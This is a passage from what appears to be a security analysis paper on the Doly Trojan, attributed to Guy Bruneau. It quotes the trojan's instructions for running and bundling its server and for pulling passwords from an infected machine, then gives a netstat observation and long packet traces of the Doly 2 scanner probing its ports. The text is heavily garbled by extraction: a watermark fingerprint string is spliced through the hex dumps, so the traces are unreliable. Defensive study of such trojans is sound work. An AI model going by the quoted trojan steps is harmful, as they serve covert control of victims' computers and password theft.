/ShowMe (Server.exe /ShowMe) - If you installed the server and you don't know how to close it (you run it without the /ShowMe command) Key fingerprint just restart = AF19 it will FA27 be fine 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46 - If you guys out there want to make the server install him self you may do it if you wish and i put a little something for you there if you run the server with a program command it will run it Guy Bruneau Page 18 of 1

20 with the server (Like a file joiner without the Merged file) - (Server.exe c:\program files\icq\icq.exe) - If you want to get server passwords (its not in the command window) do this: In the main window make sure your show status window is checked - you should see a little face in the right bottom screen, click on it with the right mouse button and click on "ask me a question" and Enter this (without the ") : "send this : 0`pas?" That's it passwords should be on the way - Please do not mess around with the raw sending Cu'z there are things you don't know and might Crash the server - this is for admin use only... - If you want to get the screen capture plug - the dll is in the site with the info on installation - Netstat observation This picture shows (top) the workstation listening on TCP port 6789 after the workstation has been infected. The bottom half of the picture shows that user has connected twice to the infected computer and is still listening on port This is also reflected later with the Snort trace. NETSTAT connections 3. Network traces: Guy Bruneau Page 19 of 1

21 This detect reflect Doly 2 Trojan scanner 21:09: cloak.erin.ca.1059 > Starbase1.erin.ca.3456: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xa (E)] 450a b e241 c0a8 1e0f E..@...A... c0a8 1e0a d80 002e 9e #... b ac P... 21:09: Starbase1.erin.ca.3456 > cloak.erin.ca.1059: R 0:0(0) ack win a a8ec c0a8 1e0a E..(.z..@... c0a8 1e0f 0d e 9e12...# P...B... 21:09: cloak.erin.ca.1059 > Starbase1.erin.ca.3456: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xa (E)] 450a c e141 c0a8 1e0f E..@...A... c0a8 1e0a d80 002e 9e #... Key b002 fingerprint 2000 ac50 = AF FA F D 0300 FDB5.. DE3D..P... F8B5 06E4 A169 4E46 21:09: Starbase1.erin.ca.3456 > cloak.erin.ca.1059: R 0:0(0) ack 1 win a50d c0a8 1e0a E..(.Y..@... c0a8 1e0f 0d e 9e12...# P...B... 21:09: cloak.erin.ca.1059 > Starbase1.erin.ca.3456: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xa (E)] 450a d e041 c0a8 1e0f E..@...A... c0a8 1e0a d80 002e 9e #... b ac P... 21:09: Starbase1.erin.ca.3456 > cloak.erin.ca.1059: R 0:0(0) ack 1 win d c0a8 1e0a E..(H...@.uM... c0a8 1e0f 0d e 9e12...# P...B... 21:09: cloak.erin.ca.1059 > Starbase1.erin.ca.3456: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xa (E)] 450a e df41 c0a8 1e0f E..@...A... c0a8 1e0a d80 002e 9e #... b ac P... 21:09: Starbase1.erin.ca.3456 > cloak.erin.ca.1059: R 0:0(0) ack 1 win e6 c0a8 1e0a E..()...@... c0a8 1e0f 0d e 9e12...# P...B... 21:09: cloak.erin.ca.1060 > Starbase1.erin.ca.4567: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xb (EC)] 450b f de40 c0a8 1e0f E..@...@... c0a8 1e0a d7 002e a47d $...}... b a18c :09: Starbase1.erin.ca.4567 > cloak.erin.ca.1060: R 0:0(0) ack win e e c0a8 1e0a E..(v...@.F~... c0a8 1e0f 11d e a47e...$...~ bf 0000 P :09: cloak.erin.ca.1060 > Starbase1.erin.ca.4567: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xb (EC)] 450b 0040 a dd40 c0a8 1e0f E..@...@... c0a8 1e0a d7 002e a47d $...}... b a18c :09: Starbase1.erin.ca.4567 > cloak.erin.ca.1060: R 0:0(0) ack 1 win 0 Key 4500 fingerprint a40 = AF FA F94 c0a8 998D 1e0a FDB5 E..(:@..@..&... DE3D F8B5 06E4 A169 4E46 c0a8 1e0f 11d e a47e...$...~ bf 0000 P :09: cloak.erin.ca.1060 > Starbase1.erin.ca.4567: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xb (EC)] Guy Bruneau Page 20 of 1

22 450b 0040 a dc40 c0a8 1e0f c0a8 1e0a d7 002e a47d $...}... b a18c :09: Starbase1.erin.ca.4567 > cloak.erin.ca.1060: R 0:0(0) ack 1 win e efd c0a8 1e0a E..(ni..@.N... c0a8 1e0f 11d e a47e...$...~ bf 0000 P :09: cloak.erin.ca.1060 > Starbase1.erin.ca.4567: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xb (EC)] 450b 0040 a db40 c0a8 1e0f E..@...@... c0a8 1e0a d7 002e a47d $...}... b a18c :09: Starbase1.erin.ca.4567 > cloak.erin.ca.1060: R 0:0(0) ack 1 win a a4c6 c0a8 1e0a E..(...@... c0a8 1e0f 11d e a47e...$...~ bf 0000 P :09: Key fingerprint cloak.erin.ca.1061 = AF19 FA27 2F94 > Starbase1.erin.ca.5678: 998D FDB5 DE3D F8B5 S : (0) 06E4 A169 4E46 win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xc] 450c 0040 a da3f c0a8 1e0f E..@...?... c0a8 1e0a e 002e ab %... b a :09: Starbase1.erin.ca.5678 > cloak.erin.ca.1061: R 0:0(0) ack win bf a7 c0a8 1e0a E..(U...@.g... c0a8 1e0f 162e e ab09...% cdc 0000 P...,... 21:09: cloak.erin.ca.1061 > Starbase1.erin.ca.5678: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xc] 450c 0040 a d93f c0a8 1e0f E..@...?... c0a8 1e0a e 002e ab %... b a :09: Starbase1.erin.ca.5678 > cloak.erin.ca.1061: R 0:0(0) ack 1 win e ed2 c0a8 1e0a E..(...@... c0a8 1e0f 162e e ab09...% cdc 0000 P...,... 21:09: cloak.erin.ca.1061 > Starbase1.erin.ca.5678: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xc] 450c 0040 a d83f c0a8 1e0f E..@...?... c0a8 1e0a e 002e ab %... b a :09: Starbase1.erin.ca.5678 > cloak.erin.ca.1061: R 0:0(0) ack 1 win f5 c0a8 1e0a E..(gq..@.U... c0a8 1e0f 162e e ab09...% cdc 0000 P...,... 21:09: cloak.erin.ca.1061 > Starbase1.erin.ca.5678: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xc] 450c 0040 a d73f c0a8 1e0f E..@...?... c0a8 1e0a e 002e ab %... b a :09: Starbase1.erin.ca.5678 > cloak.erin.ca.1061: R 0:0(0) ack 1 win f ae15 c0a8 1e0a E..(.Q..@... c0a8 1e0f 162e e ab09...% cdc 0000 P...,... 21:09: cloak.erin.ca.1062 > Starbase1.erin.ca.6789: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xd (C)] 450d 0040 a d63e c0a8 1e0f E..@...>... Key c0a8 fingerprint 1e0a 0426 = AF19 1a85 002e FA27 b160 2F D 0000 FDB5...&...`... DE3D F8B5 06E4 A169 4E46 b bf :09: Starbase1.erin.ca.6789 > cloak.erin.ca.1062: R 0:0(0) ack win e f5f c0a8 1e0a E..(n...@.O_... Guy Bruneau Page 21 of 1

23 c0a8 1e0f 1a e b161...&...a c 0000 P...",.. 21:09: cloak.erin.ca.1062 > Starbase1.erin.ca.6789: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xd (C)] 450d 0040 a d53e c0a8 1e0f E..@...>... c0a8 1e0a a85 002e b &...`... b bf :09: Starbase1.erin.ca.6789 > cloak.erin.ca.1062: R 0:0(0) ack 1 win cf c0a8 1e0a E..(c...@.Y... c0a8 1e0f 1a e b161...&...a c 0000 P...",.. 21:09: cloak.erin.ca.1062 > Starbase1.erin.ca.6789: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xd (C)] 450d 0040 a d43e c0a8 1e0f E..@...>... c0a8 1e0a a85 002e b &...`... b bf :09: Key fingerprint Starbase1.erin.ca.6789 = AF19 FA27 2F94 > 998D cloak.erin.ca.1062: FDB5 DE3D F8B5 R 0:0(0) 06E4 ack A169 1 win 4E a742 c0a8 1e0a E..(.$..@..B... c0a8 1e0f 1a e b161...&...a c 0000 P...",.. 21:09: cloak.erin.ca.1062 > Starbase1.erin.ca.6789: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xd (C)] 450d 0040 aa d33e c0a8 1e0f E..@...>... c0a8 1e0a a85 002e b &...`... b bf :09: Starbase1.erin.ca.6789 > cloak.erin.ca.1062: R 0:0(0) ack 1 win c0a8 1e0a E..(F...@.w`... c0a8 1e0f 1a e b161...&...a c 0000 P...",.. 21:09: cloak.erin.ca.1063 > Starbase1.erin.ca.7890: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xe (E)] 450e 0040 ab d23d c0a8 1e0f E..@...=... c0a8 1e0a ed2 002e b7e '... b %... 21:09: Starbase1.erin.ca.7890 > cloak.erin.ca.1063: R 0:0(0) ack win a bafc c0a8 1e0a E..(.j..@... c0a8 1e0f 1ed e b7e7...' P...X.. 21:09: cloak.erin.ca.1063 > Starbase1.erin.ca.7890: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xe (E)] 450e 0040 ac d13d c0a8 1e0f E..@...=... c0a8 1e0a ed2 002e b7e '... b %... 21:09: Starbase1.erin.ca.7890 > cloak.erin.ca.1063: R 0:0(0) ack 1 win f dde c0a8 1e0a E..(o...@.M... c0a8 1e0f 1ed e b7e7...' P...X.. 21:10: cloak.erin.ca.1063 > Starbase1.erin.ca.7890: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xe (E)] 450e 0040 ad d03d c0a8 1e0f E..@...=... c0a8 1e0a ed2 002e b7e '... b %... 21:10: Starbase1.erin.ca.7890 > cloak.erin.ca.1063: R 0:0(0) ack 1 win aa bc c0a8 1e0a E..(d...@.X... c0a8 1e0f 1ed e b7e7...'... Key 5014 fingerprint = AF FA27 2F94 998D FDB5 P...X.. DE3D F8B5 06E4 A169 4E46 21:10: cloak.erin.ca.1063 > Starbase1.erin.ca.7890: S : (0) win 8192 <mss 536,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> [tos 0xe (E)] 450e 0040 ae cf3d c0a8 1e0f E..@...=... c0a8 1e0a ed2 002e b7e '... Guy Bruneau Page 22 of 1